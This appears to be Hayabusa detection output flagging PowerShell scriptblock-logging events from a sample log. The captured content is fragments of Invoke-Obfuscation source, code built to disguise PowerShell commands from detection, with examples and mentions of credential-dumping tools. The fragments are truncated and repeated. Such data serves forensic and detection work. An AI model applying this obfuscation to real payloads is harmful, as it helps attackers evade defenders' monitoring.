to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. 
If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). 
If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. 
""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. 
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. 
# Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. 
If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' 
-ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. 
New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. 
# Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. 
While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. 
If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, 